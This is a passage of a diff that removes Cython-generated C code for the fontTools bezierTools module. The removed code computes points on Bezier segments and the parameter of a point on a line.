__pyx_t_4 = PyNumber_Add(__pyx_t_6, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1115 - * if len(seg) == 2: - * return linePointAtT(*seg, t) - * elif len(seg) == 3: # <<<<<<<<<<<<<< - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1117 - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: # <<<<<<<<<<<<<< - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1117, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1118 - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_cubicPointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1118, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1117 - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: # <<<<<<<<<<<<<< - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1119 - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1119, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_Raise(__pyx_t_5, 0, 0, 0); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __PYX_ERR(0, 1119, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_68_line_t_of_pt, "_line_t_of_pt(s, e, pt)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_69_line_t_of_pt = {"_line_t_of_pt", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_68_line_t_of_pt}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_s = 0; - PyObject *__pyx_v_e = 0; - PyObject *__pyx_v_pt = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_line_t_of_pt (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_s,&__pyx_n_s_e,&__pyx_n_s_pt,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, 1); __PYX_ERR(0, 1127, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, 2); __PYX_ERR(0, 1127, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_line_t_of_pt") < 0)) __PYX_ERR(0, 1127, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_s = values[0]; - __pyx_v_e = values[1]; - __pyx_v_pt = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1127, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._line_t_of_pt", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(__pyx_self, __pyx_v_s, __pyx_v_e, __pyx_v_pt); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s, PyObject *__pyx_v_e, PyObject *__pyx_v_pt) { - PyObject *__pyx_v_sx = NULL; - PyObject *__pyx_v_sy = NULL; - PyObject *__pyx_v_ex = NULL; - PyObject *__pyx_v_ey = NULL; - PyObject *__pyx_v_px = NULL; - PyObject *__pyx_v_py = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_t_6; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_line_t_of_pt", 1); - - /* "fontTools/misc/bezierTools.py":1128 - * - * def _line_t_of_pt(s, e, pt): - * sx, sy = s # <<<<<<<<<<<<<< - * ex, ey = e - * px, py = pt - */ - if ((likely(PyTuple_CheckExact(__pyx_v_s))) || (PyList_CheckExact(__pyx_v_s))) { - PyObject* sequence = __pyx_v_s; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1128, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1128, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1128, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1128, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_sx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_sy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1129 - * def _line_t_of_pt(s, e, pt): - * sx, sy = s - * ex, ey = e # <<<<<<<<<<<<<< - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e))) || (PyList_CheckExact(__pyx_v_e))) { - PyObject* sequence = __pyx_v_e; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1129, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1129, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1129, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1129, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_ex = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ey = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1130 - * sx, sy = s - * ex, ey = e - * px, py = pt # <<<<<<<<<<<<<< - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - * # Line is a point! - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt))) || (PyList_CheckExact(__pyx_v_pt))) { - PyObject* sequence = __pyx_v_pt; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1130, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1130, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1130, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1130, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_px = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_py = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1131 - * ex, ey = e - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: # <<<<<<<<<<<<<< - * # Line is a point! - * return -1 - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_sx, __pyx_v_ex); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_6) { - } else { - __pyx_t_5 = __pyx_t_6; - goto __pyx_L10_bool_binop_done; - } - __pyx_t_3 = PyNumber_Subtract(__pyx_v_sy, __pyx_v_ey); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Absolute(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyObject_RichCompare(__pyx_t_2, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1131, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_6; - __pyx_L10_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1133 - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: - * # Line is a point! - * return -1 # <<<<<<<<<<<<<< - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_int_neg_1); - __pyx_r = __pyx_int_neg_1; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1131 - * ex, ey = e - * px, py = pt - * if abs(sx - ex) < epsilon and abs(sy - ey) < epsilon: # <<<<<<<<<<<<<< - * # Line is a point! - * return -1 - */ - } - - /* "fontTools/misc/bezierTools.py":1135 - * return -1 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): # <<<<<<<<<<<<<< - * return (px - sx) / (ex - sx) - * else: - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_sx, __pyx_v_ex); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_v_sy, __pyx_v_ey); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyNumber_Absolute(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_t_2, Py_GT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1135, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1136 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): - * return (px - sx) / (ex - sx) # <<<<<<<<<<<<<< - * else: - * return (py - sy) / (ey - sy) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyNumber_Subtract(__pyx_v_px, __pyx_v_sx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_ex, __pyx_v_sx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1136, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1135 - * return -1 - * # Use the largest - * if abs(sx - ex) > abs(sy - ey): # <<<<<<<<<<<<<< - * return (px - sx) / (ex - sx) - * else: - */ - } - - /* "fontTools/misc/bezierTools.py":1138 - * return (px - sx) / (ex - sx) - * else: - * return (py - sy) / (ey - sy) # <<<<<<<<<<<<<< - * - * - */ - /*else*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_py, __pyx_v_sy); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_ey, __pyx_v_sy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1138, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._line_t_of_pt", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_sx); - __Pyx_XDECREF(__pyx_v_sy); - __Pyx_XDECREF(__pyx_v_ex); - __Pyx_XDECREF(__pyx_v_ey); - __Pyx_XDECREF(__pyx_v_px); - __Pyx_XDECREF(__pyx_v_py); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject 